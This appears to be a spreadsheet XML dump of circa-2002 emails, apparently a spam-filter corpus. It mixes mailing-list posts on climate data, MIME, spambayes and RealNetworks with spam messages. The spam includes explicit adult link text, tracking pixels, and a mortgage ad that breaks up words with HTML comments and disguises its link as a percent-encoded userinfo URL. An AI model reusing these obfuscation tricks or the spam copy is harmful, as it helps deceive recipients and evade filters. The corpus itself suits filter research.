 &lt;b&gt;&lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&lt;a target="_blank" href="http://209.203.174.4/sk_115/4_29_iwantateenqueen/"&gt;FREE TEEN HARDCORE CLICK HERE!&lt;/a&gt;&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;a target="_blank" href="http://www.freevirginfuckers.com/eaff"&gt;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table border="0" cellpadding="6" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2" cellspacing="1"&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" bgcolor="#808080"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica" size="2" color="#FFFFFF"&gt;Removal Instructions:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="50%" valign="top" bgcolor="#F4F4F4"&gt;&lt;font face="Arial, Helvetica" size="1"&gt;You have received this advertisement because you have opted in to receive free adult internet offers and specials through our affiliated websites. If you do not wish to receive further emails or have received the email in error you may opt-out of our database here: &lt;a href="http://209.203.174.6/opt-out.php" target="_blank"&gt;http://209.203.174.6/opting-out.php&lt;/a&gt; . Please allow 24&amp;nbsp; hours for removal.&lt;/font&gt;&lt;/td&gt;
 &lt;td width="50%" valign="top" bgcolor="#F4F4F4"&gt;
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica" size="1"&gt;This e-mail is sent in compliance with the Information Exchange&lt;br&gt;
 Promotion and Privacy Protection Act. section 50 marked as&lt;br&gt;
 'Advertisement' with valid 'removal' instruction.&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 suyjiswyhhlagomhr
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: mortgage r us
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 See what ra&lt;!--hi ma--&gt;tes we can offer.&lt;p&gt;
 We w&lt;!--church--&gt;ant to help you get lo&lt;!--jesus--&gt;wer pa&lt;!--dads trailer--&gt;yments, with no ha&lt;!--ice cream00--&gt;ssle
 &lt;p&gt;
 &lt;A href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31%30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30%31@%77%77%77%2E%72%65%71%75%65%73%74%65%64%69%6E%66%6F%2E%6E%65%74/cgi-bin/best_rate_virtual.cgi?code=btbZ1"&gt;
 Cli&lt;!--bye love me--&gt;ck&lt;/a&gt;
 &lt;!--love paw--&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man kills self with home booby-traps
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537486
 Date: Not supplied
 Steve sez: "It's tragic when life imitates Wile E. Coyote cartoons. Guy 
 boobytraps his house to get his family if they try to break in, and seemingly 
 is killed himself by his own traps." Link[1] Discuss[2] (_Thanks, Steve[3]!_)
 [1] http://story.news.yahoo.com/news?tmpl=story2&amp;cid=573&amp;ncid=757&amp;e=2&amp;u=/nm/20021007/od_nm/boobytraps_dc
 [2] http://www.quicktopic.com/boing/H/K9nShVkkrRxi
 [3] http://www.portigal.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I wonder if the focus of spambayes ought not to be a classifier that
 &gt; leaves the fetching and feeding of messages to auxillary code? That
 &gt; way, it could be dropped into whatever harness that suited the
 &gt; user's situation.
 I see no reason to restrict the project to developing the classifier
 and leave the deployment to others.  Attempts at deployment in the
 real world will surely provide additional feedback for the classifier.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NYTimes.com Article: Bigger Bar Code Inches Up on Retailers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 How about a highly error corrected atomic level 3D encoding scheme that
 relies on shape, colour and chemical make up to uniquely identify every
 object in the universe.
 Objects uniquely identify themselves - theres no need for barcodes.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: CO2 and climate (was RE: Goodbye Global Warming)
</t>
  </si>
  <si>
    <t xml:space="preserve">OK, let's bring some data into the discussion:
 http://www.grida.no/climate/vital/02.htm
 (A graph, derived from Vostok ice core samples, of CO2 and temperature
 fluctuations over the past 400k years).
 &gt; Recent high-resolution studies of historical CO2 concentrations and
 &gt; temperatures over hundreds of thousands of years have shown a modest
 &gt; correlation between the two. In a number of cases, CO2 level increases
 &gt; are not in phase with temperature increases and actually trail the
 &gt; increase in temperature by a short time i.e. increases in temperature
 &gt; preceded increases in CO2 concentrations. The more studies that are done
 &gt; of the geological record, the more it seems that CO2 concentrations are
 &gt; correlated with temperature increases, but are not significantly
 &gt; causative.
 Based on the Vostok data, you are right, there is a very strong correlation
 between temperature and CO2 concentrations, but it doesn't always appear to
 be causal.
 &gt; With respect to absolute CO2 concentrations, it is also important to
 &gt; point out that our best data to date suggests that they follow a fairly
 &gt; regular cycle with a period of about 100,000 years.
 Also correct -- the peak of each cycle is at about 290-300 ppm CO2.
 &gt; As it
 &gt; happens, current CO2 concentrations are within 10% of other previous
 &gt; cyclical concentration peaks for which we have good data.
 Not correct. Mauna Loa data &lt;http://www.grida.no/climate/vital/06.htm&gt; and
 &lt;http://cdiac.ornl.gov/ftp/ndp001/maunaloa.co2&gt; show that the current CO2
 concentrations are at 370ppm, 18% *greater* than the *highest* recorded
 value from the past 400k years. Furthermore, CO2 concentrations are growing
 at 15ppm every 10 years, much faster than any recorded increase in the
 Vostok data (though perhaps the Vostok data isn't capable of such fine
 resolution).
 &gt; In other words, we may be adding to the CO2 levels,
 No, we are *definitely* adding to CO2 levels. Look at the following chart:
 http://www.grida.no/climate/vital/07.htm
 (Shows CO2 concentrations since 1870, the "historical record").
 Not only is the CO2 increase over 130 years unprecedented in the Vostok
 record, it is clear that the rate of change is *increasing*, not decreasing.
 There is no other compelling explanation for this increase, except for
 anthropogenic input. You're really out on the fringe if you're debating
 this -- even global warming skeptics generally concede this point.
 &gt; but it looks a lot like we
 &gt; would be building a molehill on top of a mountain in the historical
 &gt; record.  At the very least, there is nothing anomalous about current CO2
 &gt; concentrations.
 Wrong again. Current CO2 levels are currently unprecedented over the past
 400k years, unless there is some mechanism that allows CO2 levels to quickly
 spike, and then return back to "normal" background levels (and hence the
 spike might not show up in the ice cores).
 Still, by around 2075-2100 we will have reached 500 ppm CO2, a level that
 even you would have a hard time arguing away.
 &gt; Also, CO2 levels interact with the biosphere in a manner that ultimately
 &gt; affects temperature.  Again, the interaction is not entirely
 &gt; predictable, but this is believed to be one of the regulating negative
 &gt; feedback systems mentioned above.
 Yes, clouds and oceans are a big unknown. Still, we know ocean water has a
 finite capacity to store CO2, and if the world temperature doesn't increase,
 but we all have Seattle-like weather all the time, the effects would be
 enormous.
 &gt; Last, as greenhouse gases go, CO2 isn't particularly potent, although it
 &gt; makes up for it in volume in some cases.  Gases such as water and
 &gt; methane have a far greater impact as greenhouse gases on a per molecule
 &gt; basis.  Water vapor may actually be the key greenhouse gas, something
 &gt; that CO2 only indirectly effects through its interaction with the
 &gt; biosphere.
 Correct.
 Data on relative contributions of greenhouse gasses:
 http://www.grida.no/climate/vital/05.htm
 Note that methane concentrations now are *much* higher than pre-industrial
 levels (many cows farting, and rice paddies outgassing), and methane is also
 a contributor in the formation of atmospheric water vapor. Another clearly
 anthropogenic increase in a greenhouse gas. I'm in favor of reductions in
 methane levels as well.
 Data on water vapor here:
 http://www.agu.org/sci_soc/mockler.html
 &gt; CO2 was an easy mark for early environmentalism, but all the recent
 &gt; studies and data I've seen gives me the impression that it is largely a
 &gt; passenger on the climate ride rather than the driver.
 I tend to think that holistic, and techical approaches would work best in
 reducing global warming. I favor an energy policy that has a mix of solar,
 wind and nuclear, with all carbon-based combustion using renewable sources
 of C-H bonds. Aggressive pursuit of carbon sink strategies also makes sense
 (burying trees deep underground, for example). Approaches that involve
 reductions in lifestyle to a "sustainable" level are unrealistic --
 Americans just won't do it (you'd be surprised at the number of climate
 change researchers driving SUVs). But, as California showed during last
 year's energy crisis, shifts in patterns of consumption are possible, and
 improved efficiency is an easy sell.
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body&gt;
 &lt;table border=0 align="center" width=80%&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=Verdana size=2&gt;
 &lt;h3&gt;&lt;a href="http://track.offer888.net/cgi-bin/c?e=3444431.13"&gt;The Easiest Way to Discover the Truth about Anyone&lt;/a&gt;&lt;/h3&gt;
 &lt;p&gt;NetDetective 7.0 is an amazing new tool that allows you to dig up facts about anyone. It is all completely legal, and you can use it in the privacy of your own home without anyone ever knowing. It's cheaper and faster than hiring a private investigator.
 &lt;ul&gt;
 &lt;li&gt;Instantly locate anyone's e-mail address, phone number or address
 &lt;li&gt;Get a copy of your FBI file 
 &lt;li&gt;Find debtors and locate hidden assets 
 &lt;li&gt;Check driving and criminal records 
 &lt;li&gt;Locate old classmates, a missing family member, a long-lost love 
 &lt;li&gt;Investigate your family history - births, marriages, divorces, deaths Gain access to social security records 
 &lt;li&gt;Discover little-known ways to make untraceable phone calls 
 &lt;/ul&gt;
 &lt;p&gt;&lt;b&gt;And a lot more ...&lt;/b&gt;
 &lt;p&gt;&lt;h4&gt;&lt;a href="http://track.offer888.net/cgi-bin/c?e=3444431.13"&gt;Click here for instant download&lt;/a&gt;&lt;/h4&gt;
 &lt;p&gt;Endorsed by the National Association of Independent Private Investigators (NAIPI)
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Offer888.com's websites or you signed up with a party that has contracted with Offer888.com. To unsubscribe from our newsletter, please visit &lt;a href=http://opt-out.offer888.net/?e=jm@netnoteinc.com&gt;http://opt-out.offer888.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-23
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 YAPC 2003 Call For Venues
     posted by KM on Sunday September 22, @09:08 (news)
     http://use.perl.org/article.pl?sid=02/09/22/1312225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</si>
  <si>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Congratulations! You Get a Free Handheld Organizer!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;
 &lt;title&gt;Congratulations! You Get a Free Handheld Organizer!&lt;/title&gt;
 &lt;/head&gt;&lt;img src="http://www.ahamembership.com/cgi-bin/check_opens.cgi?acct_code=SG004" width=1 height=1&gt;&lt;body bgcolor="#ffffff" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="642" border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.ahamembership.com/assoc_images/7.3-header-PDA.gif" hspace="0"
      &gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="4" background="http://www.ahamembership.com/assoc_images/red-vertical.gif"&gt;
 &lt;/td&gt;&lt;td width="600"&gt;
 &lt;table border="0" width="600" cellpadding="0" cellspacing="10"&gt;
 &lt;tr&gt;
             &lt;td valign="top"&gt; &lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;
               &lt;/A&gt; &lt;font face="arial,helvetica" size="2"&gt;
               &lt;p&gt;Dear Friend,
               &lt;p&gt;I have your Personal Digital Organizer. It's FREE, but I need to know where to send it. &lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;Click
                 Here&lt;/A&gt; and complete the form.
               &lt;p&gt;        Organize your life and keep track of
             appointments, names and numbers with this modern digital organizer.
             Store up to 100 important text notes and 100 names/numbers.
             Features easy to use, touch-screen technology, 10 digit calculator,
             currency and metric converters, alarm clock and password
             protection.&lt;BR&gt;&lt;BR&gt;Plus you can try all of our money-saving benefits
             FREE for 30 days. &lt;A
             href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1"&gt;Act
             Now!&lt;/A&gt;
               &lt;/font&gt;&lt;/P&gt;&lt;/td&gt;
             &lt;td valign="top"&gt; &lt;font face="arial,helvetica" size="2"&gt;
               &lt;p&gt;&lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;&lt;img src="http://www.ahamembership.com/assoc_images/pdaimage.gif" border="0"&gt;&lt;/A&gt;
               &lt;/font&gt;&lt;/P&gt;&lt;/td&gt;
           &lt;/tr&gt;&lt;tr&gt;&lt;td valign="top" colspan="2"&gt;
 &lt;center&gt;
 &lt;table border="0" width="590" cellpadding="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td valign="top"&gt;
 &lt;font face="arial,helvetica" size="2"&gt;
 &lt;p&gt;
 You also get a full subscription to HOME Magazine at no additional cost!
 &lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;
 This offer is risk-free&lt;/A&gt;, registration only takes a minute and is completely secure.
 It's that easy. Your satisfaction is guaranteed because our credibility is on the line.
 &lt;p&gt;
 &lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;P.S.:
 This offer is only valid for the next 48 hours, so Act Now!&lt;/A&gt; &lt;/p&gt;
 &lt;center&gt;
 &lt;A href="http://theadmanager.com/server/c.asp?ad_key=IAMVQXAAASEN&amp;ext=1" &gt;
 &lt;img src="http://www.ahamembership.com/assoc_images/red-button.gif" width="186" height="34" border="0"&gt;&lt;/A&gt;
 &lt;p&gt;
 &lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;
 Copyright 2002, American Homeowners Association (AHA). All rights reserved.&lt;/font&gt;
 &lt;/center&gt;
 &lt;/font&gt;&lt;/P&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/center&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;td width="3" background="http://www.ahamembership.com/assoc_images/red-vertical.gif"&gt; &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="3"&gt;
 &lt;img src="http://www.ahamembership.com/assoc_images/red-bottom.gif" width="642" height="43"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/center&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=IAMVQXAAASEN"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</si>
  <si>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URL: http://www.newsisfree.com/click/215,11,215/
 Date: 2002-10-01T12:41:57+01:00
 *Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *
 Ann Hodgson* will be here on Thursday at 3pm to discuss the government's 
 record. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] The MIME information you requested (last changed 3154 Feb 14)
</t>
  </si>
  <si>
    <t xml:space="preserve">--------------------------------------------------------------------------
 What is MIME?
 MIME stands for "Multipurpose Internet Mail Extensions".  It is the
 standard for how to send multipart, multimedia, and binary data using the
 world-wide Internet email system.  Typical uses of MIME include sending
 images, audio, wordprocessing documents, programs, or even plain text
 files when it is important that the mail system does not modify any part
 of the file.  MIME also allows for labelling message parts so that a
 recipient (or mail program) may determine what to do with them. 
 How can I read a MIME message?
 Since MIME is only a few years old, there are still some mailers in use
 which do not understand MIME messages.  However, there are a growing
 number of mail programs that have MIME support built-in.  (One popular
 MIME-capable mailer for Unix, VMS and PCs is Pine, developed at the
 University of Washington and available via anonymous FTP from the host
 ftp.cac.washington.edu in the file /pine/pine.tar.Z)
 In addition, several proprietary email systems provide MIME translation
 capability in their Internet gateway products.  However, even if you do
 not have access to a MIME-capable mailer or suitable gateway, there is
 still hope! 
 There are a number of stand-alone programs that can interpret a MIME
 message.  One of the more versatile is called "munpack".  It was developed
 at Carnegie Mellon University and is available via anonymous FTP from the
 host ftp.andrew.cmu.edu in the directory pub/mpack/.  There are versions
 available for Unix, PC, Mac and Amiga systems.  For compabibility with
 older forms of transferring binary files, the munpack program can also
 decode messages in split-uuencoded format. 
 Does MIME replace UUENCODE?
 Yes.  UUENCODE has been used for some time for encoding binary files so
 that they can be sent via Internet mail, but it has several technical
 limitations and interoperability problems.  MIME uses a more robust
 encoding called "Base64" which has been carefully designed to survive the
 message transformations made by certain email gateways. 
 How can I learn more about MIME?
 The MIME Internet standard is described in RFC-1521, available via
 anonymous FTP from many different Internet hosts, including: 
      o  US East Coast                            
         Address:  ds.internic.net (198.49.45.10)        
      o  US West Coast                            
         Address:  ftp.isi.edu (128.9.0.32)      
      o  Pacific Rim                              
         Address:  munnari.oz.au (128.250.1.21)  
      o  Europe                                   
         Address:  nic.nordu.net (192.36.148.17) 
 Look for the file /rfc/rfc1521.txt
 Another source of information is the Internet news group "comp.mail.mime",
 which includes a periodic posting of a "Frequently Asked Questions" list.
 --------------------------------------------------------------------------
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[2]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: &lt;bitbitch@magnesium.net&gt;
 &gt; People are screaming and shouting over the political figures because
 &gt; they cannot be heard in any other way.
 What, are they illiterate? Mute? What's their problem? If somebody stops
 them from posting web pages, or printing newsletters, or talking on the
 phone, or organizing their /own/ conference then that would be wrong.
 I don't think free speech is a license to speak directly at and be in the
 physical presence of any particular individual of your choosing - especially
 when that individual is busy doing something else and isn't interested.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [NYT] Real Source
</t>
  </si>
  <si>
    <t xml:space="preserve">"This is a very tenuous time for Microsoft," Gartenberg said. "This is
 not a time in Microsoft's history when it can be seen as trying to do to
 Real what it did to Netscape."   Rrrrrrriiiiiight....
 http://www.nytimes.com/2002/07/22/technology/22REAL.html
 July 22, 2002
 RealNetworks Poses Challenge to Microsoft
 By JOHN MARKOFF
 SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
 RealNetworks plans to announce a new version of its software on Monday
 that can distribute audio and video in a range of formats, including
 Microsoft's own proprietary Windows Media.
 The new software is intended for large media companies and other
 corporations that need to send audio and video data to customers and
 employees in a variety of different formats. But RealNetworks
 acknowledged that it was possible that the company might incur
 Microsoft's legal wrath.
 Nevertheless, Rob Glaser, a former Microsoft executive who founded
 RealNetworks as Progressive Networks in 1994, said he believed the
 strategy was good for both Microsoft and consumers.
 "A rational way for them to respond would be to say, `This is great,' "
 he said. "That would be Microsoft of the future."
 Mr. Glaser said his company, based in Seattle, had developed a version
 of the Microsoft Media Server software that comes with the Windows
 operating system.
 He said RealNetworks' engineers had studied the data that was sent
 between the Microsoft media server software and the Windows Media Player
 program and recreated the technology needed to play files in the
 Microsoft format. This method created a so-called clean-room version,
 meaning the developers built the transmission software without any
 knowledge about the underlying program.
 Microsoft has adopted a similar strategy at several junctures,
 Mr. Glaser said, reverse-engineering technologies like NetWare,
 PostScript and JavaScript at different times.
 Microsoft executives said the company currently licensed the Windows
 Media Player technology to a variety of companies including Yahoo,
 RealNetworks and the America Online unit of AOL Time Warner. But a
 Microsoft executive said that a clean-room copy of the Windows server
 technology could lead to quality and performance issues.
 "It's kind of hard to speculate about the technology until we see it,"
 said Dave Fester, the general manager of the Windows Media division. If
 a company has not licensed the server software, he added, "we would need
 to look at it and see what they're doing."
 RealNetworks appears to be endeavoring to avoid being "Netscaped," a
 reference to the fate that befell the Netscape Communications
 Corporation when Microsoft decided to make an Internet browser, which
 was pioneered commercially by Netscape, a standard part of the Windows
 operating system. Netscape was later acquired by AOL Time
 Warner. Microsoft's decision to build an Internet browser into Windows
 and give it away at no additional cost led directly to a bitter
 antitrust lawsuit brought by the Justice Department in 1997.
 RealNetworks, which was a pioneer in the market for streaming media to
 desktop personal computers, has been under growing pressure from
 Microsoft, which is giving away both the server and Windows Media Player
 program as part of its operating strategy. RealNetworks also faces
 challenges from Apple Computer, which offers the QuickTime media player
 as a part of its Macintosh OS X operating system and sells a more
 full-featured player.
 Moreover, in recent months Macromedia Inc., which makes the Flash
 animation software used on many Web sites, has added video capabilities
 to its technology, making it a potential rival.
 RealNetworks is gambling that with a proliferation of different
 standards and formats for video and audio, the media corporations that
 make content available over the Internet will flock to a single system
 that supports multiple types of data. The company is trying to shift the
 focus of the competition from the PC desktop to the server, according to
 analysts.
 Several analysts said the RealNetworks shift in strategy could put
 Microsoft on the defensive.
 "Real has got the experience and sophistication to pull this off," said
 Richard Doherty, the president of Envisioneering, a market research and
 consulting firm based in Seaford, N.Y. "It will open up a new horse race."
 Until now the companies have been engaged in a technology war to rapidly
 increase the power and quality of each of their media players. At the
 same time, they have competed over which of the programs are placed on
 the desktops of personal computer users. RealNetworks claims to have
 700,000 subscribers for pay services, but it is perceived as being
 increasingly vulnerable, according to some analysts, because Microsoft
 has included its Media Player as part of the Windows operating system,
 which dominates the PC market.
 There are dozens of data formats for playing audio and video on the
 Internet, but the dominant ones are RealAudio and RealVideo from
 RealNetworks, QuickTime from Apple, Windows Media from Microsoft and the
 industry digital movie standards MPEG-2 and MPEG-4.
 Microsoft and RealNetworks are currently locked in a close race for
 desktop media player leadership. In the first quarter of this year,
 according to survey data collected by Jupiter Research, a market
 research firm based in New York, RealNetworks' RealOne Player had a 29.1
 percent share of media players, while Microsoft's Windows Media Player
 had a 28.2 percent share. Apple's Quicktime player was third, with a
 12.2 percent.
 The new server software from RealNetworks is part of a version of the
 company's media server that is to be introduced on Monday and which will
 be called the Helix Universal Server. RealNetworks said it would offer
 performance data based on a test it financed at an independent testing
 service, KeyLabs, that indicate that the Helix software can, under some
 conditions, deliver up to four times the speed of the Windows Media
 Server in Microsoft's operating system. (Software servers are programs
 that run on powerful computers and can send streams of digital
 information to many computer users simultaneously.)
 At a news conference scheduled to be held in San Francisco, RealNetworks
 is also expected to announce that it plans to make the Helix software
 available as part of a strategy known as community source, which will
 make it possible for RealNetworks partners and competitors to take
 advantage of the original programmers' instructions.
 RealNetworks is to announce a range of partners, including Hitachi,
 Hewlett-Packard, I.B.M., Deutsche Telekom, NEC, Nokia, Cisco Systems,
 Oracle, Sun Microsystems, Palm, Texas Instruments and others. These
 partners could then incorporate the software into their own hardware and
 software products.
 Under the licensing strategy, companies will be able to freely gain
 access to the underlying code that the Helix program is based on, but
 they will still pay a licensing fee when they sell commercial products
 based on the technology.
 The community-source approach to software, which was pioneered by Sun to
 distribute its Java programming language, is a variation upon the
 original free software or open-source approach which has confounded the
 software industry in recent years.
 While open-source software can be freely shared, with some restrictions,
 the community-source approach is more restrictive and yet still tries to
 persuade others to collaborate and add innovative ideas.
 Other large technology companies including Sun, I.B.M. and Apple, have
 all now adopted variations on such open-source strategy, with varying
 results. In Sun's case, the company has been criticized because, while
 Java has become an industry standard, the company has not been the
 principal financial beneficiary in many cases.
 RealNetworks is trying to strike a balance between opening up its
 technology to persuade others to participate and innovate and not losing
 control of the technology entirely, Mr. Glaser said. "We think we've
 struck the balance well," he said.
 Analysts said the strategy shift by RealNetworks was likely to shake up
 the industry. "The moment you've open-sourced something you've cornered
 your competitor," said Matthew Berk, an analyst a Jupiter Research. "To
 date this stuff has been very proprietary. Opening it up makes it
 accessible to creative and gifted programmers who will come up with wild
 stuff that the companies have never considered."
 Mr. Glaser said he expected other companies to produce technology that
 would rival RealNetworks' commercially as a result of the
 community-source strategy.
 One possibility is that companies such as Sun or I.B.M. could decide to
 add the Helix technology of RealNetworks as a standard component of
 their operating systems. Although RealNetworks might not get a
 significant financial benefit from such an arrangement it could
 contribute to making its Helix software a de facto industry standard.
 Mr. Glaser said he had struck upon the idea of making his media server
 software open source while visiting with an executive from Nokia, the
 world's largest cellphone maker.
 "Taking all of this stuff beyond the PC has been a huge motivation for
 us," he said. When he realized that Nokia was interested in deploying
 the software technology on as many as 30 to 40 different types of
 phones, he realized that RealNetworks did not have enough programming
 talent to support the effort.
 "I told him, `I don't think we have enough engineers even if you guys
 were willing to pay us,' " he said.
 That touched off a search for an alternative way of having the two
 companies cooperate.
 http://quicken.com.com/2100-1023-945406.html
 Real takes the open-source route 
 By Jim Hu 
 Staff Writer, CNET News.com
 July 22, 2002, 1:55 PM PT
 RealNetworks on Monday unveiled a new open-source version of its
 streaming media technology that supports multiple file formats for audio
 and video, including those that use Microsoft's Windows Media technology. 
 The new campaign, dubbed "Helix," and first reported by The New York
 Times, marks one of the most ambitious moves in the company's
 history. RealNetworks is simultaneously releasing technology without
 permission that plugs in to Microsoft's competing software and is
 raising the hood on much of its own software technology to "open source"
 developers or anyone else who wants to look. 
 The twin moves raise the risk of lawsuits and renewed competition --
 potentially even from Redmond, Wash.-based Microsoft itself, once it
 gets a look under the hood at RealNetworks' technology. But it marks a
 dramatic, potential way for a company watching its market share diminish
 to regain momentum and support across an industry where many other
 players remain skeptical of Microsoft's power.
 "It's a very bold move on the part of Real," said Michael Gartenberg, a
 research director for analyst firm Jupiter Research. "This was a shot
 fired by Real and fired directly at Redmond." 
 The move is the latest in a series of strategic twists and turns that
 has made RealNetworks one of the only companies to survive direct
 Microsoft competition for years. While the company has expanded into
 paid subscription content business, its software and streaming media
 infrastructures have been under increasing pressure from Microsoft,
 which has deemed multimedia to be one of the major drives under the
 latest versions of its Windows operating system. 
 Real's Helix announcement mainly involves the technology that allows
 media files to move from place to place over the Internet. RealNetworks
 and Microsoft both produce servers that allow video and audio to be
 streamed from a content company such as CNN or NBC to a personal
 computer. Real has charged for this software, while Microsoft has given
 it away for free. 
 In April, RealMedia reached 17 million at-home viewers, compared with
 Windows Media at 15.1 million and Apple Computer's QuickTime at 7.3
 million, according to Nielsen/NetRatings. At work, Windows Media drew
 about 12.2 million unique viewers, compared with RealMedia's 11.6
 million and QuickTime's 5 million. 
 Real's own new product, called the Universal Server, will allow one
 server to stream Real's technology, Microsoft files, Apple Computer's
 QuickTime, and others. Most other competing products do not support
 competitors' technology. 
 "When you have all these different platforms, and all these different
 protocols, it gets unmanageable," RealNetworks' Rob Glaser said at a
 high-glitz press conference in San Francisco announcing the product. "A
 lot of what (this technology) is about is breaking those bottlenecks and
 making convergence really converge." 
 To make the new product compatible with Microsoft files, however, the
 company pursued a risky strategy known as "reverse engineering," in
 which developers examine a competitor's product to see how it works and
 try to create something that works just like it. 
 Glaser said that engineers worked entirely in a "clean room"
 environment, meaning that they had no access to actual Microsoft
 code. Had they simply copied code, they could be liable for patent
 infringement. The resulting product simply mimics the way that
 Microsoft's files are sent across networks and allows a Windows Media
 player to receive the file. 
 Other companies have been sued for simply copying a competitor's code
 and putting it in their own products. But RealNetworks says it's not
 worried about Microsoft lawsuits, because it took precautions to do all
 development in the "clean room" environment. Microsoft itself has
 engaged in this kind of legal reverse engineering. 
 Analysts say Microsoft, which still faces antitrust lawsuits, is in no
 position to sue in any case. 
 "This is a very tenuous time for Microsoft," Gartenberg said. "This is
 not a time in Microsoft's history when it can be seen as trying to do to
 Real what it did to Netscape." 
 The influential giant?
 Certainly, Monday's announcement acknowledges Microsoft's influence in
 media technology, something Glaser and Real have often been loathe to do. 
 Microsoft was quick to spin Monday's announcement as further validation
 of its strength in the marketplace. 
 "It's an admission of RealNetworks that it's important for them to
 support Windows Media and that we're now the leading player among home
 and work users," said Michael Aldridge, lead product manager for
 Microsoft's Windows Digital Media division. 
 Aldridge added that RealNetworks currently has a licensing agreement for
 its media player to support Windows audio and video formats. However,
 RealNetworks and Microsoft do not have an agreement to allow the server
 to deliver Windows Media formats to end users, which is what
 RealNetworks trying to do. 
 Aldridge declined to comment on RealNetworks' replication of Microsoft's
 technology. 
 In addition to its own new product, Real has promised to give away
 source code to much of the underlying technology for streaming
 media. That stops short of the actual file format, or "codec" itself,
 but will provide the open-source community and other companies with
 powerful new tools to build their own streaming media players or
 software. 
 Glaser said he wouldn't initially make the software code that mimics
 Microsoft's streaming available but that he was considering the idea. A
 first chunk of code underlying the RealNetworks multimedia player
 software will be released in 90 days. Other code, including the basic
 functions of its streaming media server and encoder, will be released by
 the end of the year, the company said. 
 The company's plan to reveal its source code--the basic instructions
 underlying the software--echoes similar moves made by Netscape
 Communications to defend against Microsoft. In March 1998, Netscape took
 the bold step of opening its source code to allow software developers to
 help create the next generation of its popular browser. 
 James Barksdale, then CEO of Netscape, said the move would allow the
 company to "tap into a virtually unlimited developer talent pool."
 Instead, the effort, which has evolved into the Mozilla.org project, hit
